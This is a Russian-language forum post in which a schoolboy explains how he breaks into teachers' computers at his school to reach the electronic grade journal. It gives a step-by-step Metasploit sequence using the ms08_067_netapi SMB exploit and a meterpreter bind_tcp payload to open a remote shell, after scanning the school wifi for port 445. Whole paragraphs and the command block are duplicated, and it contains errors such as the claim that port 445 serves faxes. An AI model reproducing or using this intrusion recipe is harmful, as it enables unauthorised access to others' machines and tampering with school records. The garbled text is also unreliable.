Тема баян. Но не видел, что бы её форсили.
У некоторых операционных систем Windows есть отрытый порт 445 для факсов и т.п. Но мы будем использовать его в корыстных целях.
Сначала чекаем на наличие открытого порта. P.s. Так как я школьник, могу привести пример. У нас в школе довольно много личных учительских комьютеров, и на них ставятся оценки в электронный дневник. Подключаюсь к основному wifi, к которому подключены их компы (Про взлом wifi много статей уже есть, come on)
Сканирую компьютеры через прогу на телефоне Fing (ne reklama), если вижу в наличии открытый порт 445 то смело на следующий день иду с нетбуком в школу, и начинаю махинации. Будем мы получать доступ через exploit
Дальше команды, кому не интересно, листайте
У некоторых операционных систем Windows есть отрытый порт 445 для факсов и т.п. Но мы будем использовать его в корыстных целях.
Сначала чекаем на наличие открытого порта. P.s. Так как я школьник, могу привести пример. У нас в школе довольно много личных учительских комьютеров, и на них ставятся оценки в электронный дневник. Подключаюсь к основному wifi, к которому подключены их компы (Про взлом wifi много статей уже есть, come on)
Сканирую компьютеры через прогу на телефоне Fing (ne reklama), если вижу в наличии открытый порт 445 то смело на следующий день иду с нетбуком в школу, и начинаю махинации. Будем мы получать доступ через exploit
Дальше команды, кому не интересно, листайте
В терминале мы пишем "msfconsole" "nmap -v 192.168..... (айпи жертвы) "search netapi"
и"exploit/windows/smb/ms08_067_netapi"
"show options"
"set RHOST (ip)"
"show payloads"
"set payload windows/meterpreter/bind_tcp" - Windows 7 (там под другие операционки есть)
"show options"
"exploid"
и"exploit/windows/smb/ms08_067_netapi"
"show options"
"set RHOST (ip)"
"show payloads"
"set payload windows/meterpreter/bind_tcp" - Windows 7 (там под другие операционки есть)
"show options"
"exploid"
Всё! Мы получили доступ к пк (тестировалось на xp/7)
"shell" - cmd жертвы
Дальше сами, удачи!